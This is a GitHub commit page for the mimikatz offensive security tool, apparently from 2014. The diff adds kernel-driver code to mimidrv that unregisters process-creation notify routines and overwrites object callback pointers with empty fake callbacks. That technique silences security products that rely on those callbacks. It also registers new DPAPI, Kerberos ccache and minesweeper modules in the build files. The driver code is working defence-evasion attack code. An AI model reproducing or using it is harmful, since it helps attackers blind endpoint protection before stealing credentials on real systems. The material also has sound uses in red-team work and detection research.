Skip to content

Commit

Permalink
minesweeper, Kerberos ccache, Windows 10 update, newsoft contre-rump,…
Browse files Browse the repository at this point in the history 
… ...
  • Loading branch information
@gentilkiwi
gentilkiwi committed Nov 20, 2014
1 parent 5d19161 commit d5676aa
Show file tree
Hide file tree
Showing 44 changed files with 1,522 additions and 337 deletions.
3 changes: 3 additions & 0 deletions inc/globals.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,6 +17,7 @@
#include <wchar.h>
#include "../modules/kull_m_output.h"
//#define KERBEROS_TOOLS
//#define DPAPI_TOOLS
//#define LSASS_DECRYPT
#define NET_MODULE
#ifdef _M_X64
Expand All @@ -29,6 +30,7 @@
#define MIMIKATZ_VERSION L"2.0 alpha"
#define MIMIKATZ_CODENAME L"Kiwi en C"
#define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") release \"" MIMIKATZ_CODENAME L"\" (" TEXT(__DATE__) L" " TEXT(__TIME__) L")"
#define MIMIKATZ_SPECIAL L" "
#define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log"
#define MIMIKATZ_DRIVER L"mimidrv"
#define MIMIKATZ_KERBEROS_EXT L"kirbi"
Expand Down Expand Up @@ -74,6 +76,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_BUILD_8 9200
#define KULL_M_WIN_BUILD_BLUE 9600
#define KULL_M_WIN_BUILD_10 9800
#define KULL_M_WIN_BUILD_10b 9879

#define KULL_M_WIN_MIN_BUILD_XP 2500
#define KULL_M_WIN_MIN_BUILD_2K3 3000
Expand Down
3 changes: 3 additions & 0 deletions mimidrv/ioctl.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -23,6 +23,9 @@
#define IOCTL_MIMIDRV_NOTIFY_REG_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x043, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define IOCTL_MIMIDRV_NOTIFY_OBJECT_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x044, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

#define IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x045, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x049, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

#define IOCTL_MIMIDRV_FILTER_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x050, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define IOCTL_MIMIDRV_MINIFILTER_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x051, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

Expand Down
146 changes: 127 additions & 19 deletions mimidrv/kkll_m_notify.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,11 @@ PKKLL_M_MEMORY_OFFSETS pCmpCallBackOffsets = NULL;
POBJECT_DIRECTORY *ObpTypeDirectoryObject = NULL;
PKKLL_M_MEMORY_OFFSETS pObpTypeDirectoryObjectOffsets = NULL;

PPSSETCREATEPROCESSNOTIFYROUTINEEX pPsSetCreateProcessNotifyRoutineEx = NULL;
POB_PRE_OPERATION_CALLBACK kkll_m_notify_fakePre = NULL;
POB_POST_OPERATION_CALLBACK kkll_m_notify_fakePost = NULL;


#ifdef _M_X64
UCHAR PTRN_W23_Thread[] = {0x66, 0x90, 0x66, 0x90, 0x48, 0x8b, 0xce, 0xe8};
UCHAR PTRN_WVI_Thread[] = {0x49, 0x8b, 0x8c, 0x24, 0xf8, 0x01, 0x00, 0x00, 0x41, 0xb0, 0x01, 0x49, 0x8b, 0x94, 0x24, 0x88, 0x03, 0x00, 0x00};
Expand Down Expand Up @@ -286,24 +291,7 @@ NTSTATUS kkll_m_notify_list_object(PKIWI_BUFFER outBuffer)
if(KiwiOsIndex >= KiwiOsIndex_VISTA)
{
for(pCallbackEntry = *(POBJECT_CALLBACK_ENTRY *) (pType + pObpTypeDirectoryObjectOffsets->off3) ; NT_SUCCESS(status) && (pCallbackEntry != (POBJECT_CALLBACK_ENTRY) (pType + pObpTypeDirectoryObjectOffsets->off3)) ; pCallbackEntry = (POBJECT_CALLBACK_ENTRY) pCallbackEntry->CallbackList.Flink)
{
if(pCallbackEntry->PreOperation || pCallbackEntry->PostOperation)
{
status = kprintf(outBuffer, L"\t* Callback [type %u]\n", pCallbackEntry->Operations);
if(NT_SUCCESS(status) && pCallbackEntry->PreOperation)
{
status = kprintf(outBuffer, L"\t\tPreOperation : ");
if(NT_SUCCESS(status))
status = kkll_m_modules_fromAddr(outBuffer, pCallbackEntry->PreOperation);
}
if(NT_SUCCESS(status) && pCallbackEntry->PostOperation)
{
status = kprintf(outBuffer, L"\t\tPreOperation : ");
if(NT_SUCCESS(status))
status = kkll_m_modules_fromAddr(outBuffer, pCallbackEntry->PostOperation);
}
}
}
status = kkll_m_notify_desc_object_callback(pCallbackEntry, outBuffer);
}
for(j = 0; NT_SUCCESS(status) && (j < 8) ; j++)
{
Expand All @@ -319,4 +307,124 @@ NTSTATUS kkll_m_notify_list_object(PKIWI_BUFFER outBuffer)
}
}
return status;
}
}

NTSTATUS kkll_m_notify_desc_object_callback(POBJECT_CALLBACK_ENTRY pCallbackEntry, PKIWI_BUFFER outBuffer)
{
NTSTATUS status = STATUS_SUCCESS;
if(pCallbackEntry->PreOperation || pCallbackEntry->PostOperation)
{
status = kprintf(outBuffer, L"\t* Callback [type %u] - Handle 0x%p (@ 0x%p)\n", pCallbackEntry->Operations, pCallbackEntry->Handle, pCallbackEntry);
if(NT_SUCCESS(status) && pCallbackEntry->PreOperation)
{
status = kprintf(outBuffer, L"\t\tPreOperation : ");
if(NT_SUCCESS(status))
status = kkll_m_modules_fromAddr(outBuffer, pCallbackEntry->PreOperation);
}
if(NT_SUCCESS(status) && pCallbackEntry->PostOperation)
{
status = kprintf(outBuffer, L"\t\tPreOperation : ");
if(NT_SUCCESS(status))
status = kkll_m_modules_fromAddr(outBuffer, pCallbackEntry->PostOperation);
}
}
return status;
}


UNICODE_STRING uPsSetCreateProcessNotifyRoutineEx = {66, 68, L"PsSetCreateProcessNotifyRoutineEx"};
NTSTATUS kkll_m_notify_init()
{
SIZE_T codeSize;
NTSTATUS status = STATUS_NOT_FOUND;
if(pPsSetCreateProcessNotifyRoutineEx = (PPSSETCREATEPROCESSNOTIFYROUTINEEX) MmGetSystemRoutineAddress(&uPsSetCreateProcessNotifyRoutineEx))

codeSize = (ULONG_PTR) kkll_m_notify_fake_ObjectPreCallback_end - (ULONG_PTR) kkll_m_notify_fake_ObjectPreCallback;
if(kkll_m_notify_fakePre = (POB_PRE_OPERATION_CALLBACK) ExAllocatePoolWithTag(NonPagedPool, codeSize, POOL_TAG))
RtlCopyMemory(kkll_m_notify_fakePre, kkll_m_notify_fake_ObjectPreCallback, codeSize);

codeSize = (ULONG_PTR) kkll_m_notify_fake_ObjectPostCallback_end - (ULONG_PTR) kkll_m_notify_fake_ObjectPostCallback;
if(kkll_m_notify_fakePost = (POB_POST_OPERATION_CALLBACK) ExAllocatePoolWithTag(NonPagedPool, codeSize, POOL_TAG))
RtlCopyMemory(kkll_m_notify_fakePost, kkll_m_notify_fake_ObjectPostCallback, codeSize);


if(pPsSetCreateProcessNotifyRoutineEx && kkll_m_notify_fakePre && kkll_m_notify_fakePost)
status = STATUS_SUCCESS;
else
{
if(kkll_m_notify_fakePre)
{
ExFreePoolWithTag(kkll_m_notify_fakePre, POOL_TAG);
kkll_m_notify_fakePre = NULL;
}
if(kkll_m_notify_fakePost)
{
ExFreePoolWithTag(kkll_m_notify_fakePost, POOL_TAG);
kkll_m_notify_fakePost = NULL;
}
}
return status;
}

NTSTATUS kkll_m_notify_remove_process(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)
{
NTSTATUS status = STATUS_INVALID_HANDLE;
UNICODE_STRING uString;

if(bufferIn && (szBufferIn == sizeof(PCREATE_PROCESS_NOTIFY_ROUTINE)))
{
status = PsSetCreateProcessNotifyRoutine(*(PCREATE_PROCESS_NOTIFY_ROUTINE *) bufferIn, TRUE);
if(pPsSetCreateProcessNotifyRoutineEx)
status = pPsSetCreateProcessNotifyRoutineEx(*(PCREATE_PROCESS_NOTIFY_ROUTINE_EX *) bufferIn, TRUE);

if(NT_SUCCESS(status))
{
status = kprintf(outBuffer, L"Removed : ");
if(NT_SUCCESS(status))
status = kkll_m_modules_fromAddr(outBuffer, *(PVOID *) bufferIn);
}

}
return status;
}


NTSTATUS kkll_m_notify_remove_object(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)
{
NTSTATUS status = STATUS_INVALID_HANDLE;
POBJECT_CALLBACK_ENTRY pCallbackEntry;

if(bufferIn && (szBufferIn == sizeof(POBJECT_CALLBACK_ENTRY)))
{
if(pCallbackEntry = *(POBJECT_CALLBACK_ENTRY *) bufferIn)
{
status = kkll_m_notify_desc_object_callback(pCallbackEntry, outBuffer);
if(NT_SUCCESS(status))
{
if(pCallbackEntry->PreOperation && kkll_m_notify_fakePre)
pCallbackEntry->PreOperation = kkll_m_notify_fakePre;
if(pCallbackEntry->PostOperation && kkll_m_notify_fakePost)
pCallbackEntry->PostOperation = kkll_m_notify_fakePost;

status = kkll_m_notify_desc_object_callback(pCallbackEntry, outBuffer);
}
}
}


return status;
}

#pragma optimize("", off)
OB_PREOP_CALLBACK_STATUS kkll_m_notify_fake_ObjectPreCallback(IN PVOID RegistrationContext, IN POB_PRE_OPERATION_INFORMATION OperationInformation)
{
return OB_PREOP_SUCCESS;
}
DWORD kkll_m_notify_fake_ObjectPreCallback_end(){return 'kpre';}


VOID kkll_m_notify_fake_ObjectPostCallback(IN PVOID RegistrationContext, IN POB_POST_OPERATION_INFORMATION OperationInformation)
{
}
DWORD kkll_m_notify_fake_ObjectPostCallback_end(){return 'kpos';}
#pragma optimize("", on)
15 changes: 14 additions & 1 deletion mimidrv/kkll_m_notify.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -39,11 +39,24 @@ typedef struct _OBJECT_CALLBACK_ENTRY {
/* ... */
} OBJECT_CALLBACK_ENTRY, *POBJECT_CALLBACK_ENTRY;

typedef NTSTATUS (* PPSSETCREATEPROCESSNOTIFYROUTINEEX) ( __in PCREATE_PROCESS_NOTIFY_ROUTINE_EX NotifyRoutine, __in BOOLEAN Remove);
//typedef VOID (* POBUNREGISTERCALLBACKS) (__in PVOID RegistrationHandle);

NTSTATUS kkll_m_notify_init();
NTSTATUS kkll_m_notify_list_thread(PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_list_process(PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_list_image(PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_list_reg(PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_list_object(PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_desc_object_callback(POBJECT_CALLBACK_ENTRY pCallbackEntry, PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_remove_process(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_remove_object(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer);

NTSTATUS kkll_m_notify_list(PKIWI_BUFFER outBuffer, PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax);
NTSTATUS kkll_m_notify_search(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax, PKKLL_M_MEMORY_OFFSETS * pOffsets);
NTSTATUS kkll_m_notify_search(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax, PKKLL_M_MEMORY_OFFSETS * pOffsets);


OB_PREOP_CALLBACK_STATUS kkll_m_notify_fake_ObjectPreCallback(IN PVOID RegistrationContext, IN POB_PRE_OPERATION_INFORMATION OperationInformation);
DWORD kkll_m_notify_fake_ObjectPreCallback_end();
VOID kkll_m_notify_fake_ObjectPostCallback(IN PVOID RegistrationContext, IN POB_POST_OPERATION_INFORMATION OperationInformation);
DWORD kkll_m_notify_fake_ObjectPostCallback_end();
9 changes: 9 additions & 0 deletions mimidrv/mimidrv.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -39,6 +39,9 @@ NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRe
pDeviceObject->Flags &= ~DO_DEVICE_INITIALIZING;
IoCreateSymbolicLink(&uStrDosDeviceName, &uStrDriverName);
status = AuxKlibInitialize();

if(KiwiOsIndex >= KiwiOsIndex_VISTA)
status = kkll_m_notify_init();
}
}
return status;
Expand Down Expand Up @@ -113,6 +116,12 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
case IOCTL_MIMIDRV_NOTIFY_OBJECT_LIST:
status = kkll_m_notify_list_object(&kOutputBuffer);
break;
case IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE:
status = kkll_m_notify_remove_process(szBufferIn, bufferIn, &kOutputBuffer);
break;
case IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE:
status = kkll_m_notify_remove_object(szBufferIn, bufferIn, &kOutputBuffer);
break;

case IOCTL_MIMIDRV_FILTER_LIST:
status = kkll_m_filters_list(&kOutputBuffer);
Expand Down
3 changes: 2 additions & 1 deletion mimikatz/mimikatz.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,7 @@ const KUHL_M * mimikatz_modules[] = {
&kuhl_m_misc,
&kuhl_m_token,
&kuhl_m_vault,
&kuhl_m_minesweeper,
#ifdef NET_MODULE
&kuhl_m_net,
#endif
Expand All @@ -41,7 +42,7 @@ int wmain(int argc, wchar_t * argv[])
L" ## / \\ ## /* * *\n"
L" ## \\ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )\n"
L" '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)\n"
L" '#####' Microsoft BlueHat edition! with %2u modules * * */\n\n", ARRAYSIZE(mimikatz_modules));
L" '#####' " MIMIKATZ_SPECIAL L" with %2u modules * * */\n\n", ARRAYSIZE(mimikatz_modules));

mimikatz_initOrClean(TRUE);
for(i = MIMIKATZ_AUTO_COMMAND_START ; (i < argc) && (status != STATUS_FATAL_APP_EXIT) ; i++)
Expand Down
1 change: 1 addition & 0 deletions mimikatz/mimikatz.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,7 @@
#include "modules/kuhl_m_misc.h"
#include "modules/kuhl_m_token.h"
#include "modules/kuhl_m_vault.h"
#include "modules/kuhl_m_minesweeper.h"
#ifdef NET_MODULE
#include "modules/kuhl_m_net.h"
#endif
Expand Down
6 changes: 6 additions & 0 deletions mimikatz/mimikatz.vcxproj
View file
Original file line number Diff line number Diff line change
Expand Up @@ -88,6 +88,7 @@
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ItemGroup>
<ClCompile Include="..\modules\kull_m_asn1.c" />
<ClCompile Include="..\modules\kull_m_dpapi.c" />
<ClCompile Include="..\modules\kull_m_file.c" />
<ClCompile Include="..\modules\kull_m_handle.c" />
<ClCompile Include="..\modules\kull_m_kernel.c" />
Expand All @@ -104,6 +105,7 @@
<ClCompile Include="..\modules\kull_m_token.c" />
<ClCompile Include="mimikatz.c" />
<ClCompile Include="modules\kerberos\kuhl_m_kerberos.c" />
<ClCompile Include="modules\kerberos\kuhl_m_kerberos_ccache.c" />
<ClCompile Include="modules\kerberos\kuhl_m_kerberos_pac.c" />
<ClCompile Include="modules\kerberos\kuhl_m_kerberos_ticket.c" />
<ClCompile Include="modules\kuhl_m_crypto.c" />
Expand All @@ -121,6 +123,7 @@
<ClCompile Include="modules\kuhl_m_token.c" />
<ClCompile Include="modules\kuhl_m_ts.c" />
<ClCompile Include="modules\kuhl_m_vault.c" />
<ClCompile Include="modules\kuhl_m_minesweeper.c" />
<ClCompile Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.c" />
<ClCompile Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt6.c" />
<ClCompile Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt63.c" />
Expand All @@ -138,6 +141,7 @@
<ItemGroup>
<ClInclude Include="..\modules\kull_m_asn1.h" />
<ClInclude Include="..\modules\kull_m_crypto_system.h" />
<ClInclude Include="..\modules\kull_m_dpapi.h" />
<ClInclude Include="..\modules\kull_m_file.h" />
<ClInclude Include="..\modules\kull_m_handle.h" />
<ClInclude Include="..\modules\kull_m_kernel.h" />
Expand All @@ -157,6 +161,7 @@
<ClInclude Include="..\modules\kull_m_token.h" />
<ClInclude Include="mimikatz.h" />
<ClInclude Include="modules\kerberos\kuhl_m_kerberos.h" />
<ClInclude Include="modules\kerberos\kuhl_m_kerberos_ccache.h" />
<ClInclude Include="modules\kerberos\kuhl_m_kerberos_pac.h" />
<ClInclude Include="modules\kerberos\kuhl_m_kerberos_ticket.h" />
<ClInclude Include="modules\kuhl_m.h" />
Expand All @@ -175,6 +180,7 @@
<ClInclude Include="modules\kuhl_m_token.h" />
<ClInclude Include="modules\kuhl_m_ts.h" />
<ClInclude Include="modules\kuhl_m_vault.h" />
<ClInclude Include="modules\kuhl_m_minesweeper.h" />
<ClInclude Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.h" />
<ClInclude Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt6.h" />
<ClInclude Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt63.h" />
Expand Down
18 changes: 18 additions & 0 deletions mimikatz/mimikatz.vcxproj.filters
View file
Original file line number Diff line number Diff line change
Expand Up @@ -140,6 +140,15 @@
<ClCompile Include="modules\kuhl_m_service_remote.c">
<Filter>local modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_dpapi.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="modules\kerberos\kuhl_m_kerberos_ccache.c">
<Filter>local modules\kerberos</Filter>
</ClCompile>
<ClCompile Include="modules\kuhl_m_minesweeper.c">
<Filter>local modules</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="mimikatz.h" />
Expand Down Expand Up @@ -299,6 +308,15 @@
<ClInclude Include="modules\kuhl_m_service_remote.h">
<Filter>local modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_dpapi.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="modules\kerberos\kuhl_m_kerberos_ccache.h">
<Filter>local modules\kerberos</Filter>
</ClInclude>
<ClInclude Include="modules\kuhl_m_minesweeper.h">
<Filter>local modules</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Filter Include="local modules">
Expand Down
Loading

0 comments on commit d5676aa

Please sign in to comment.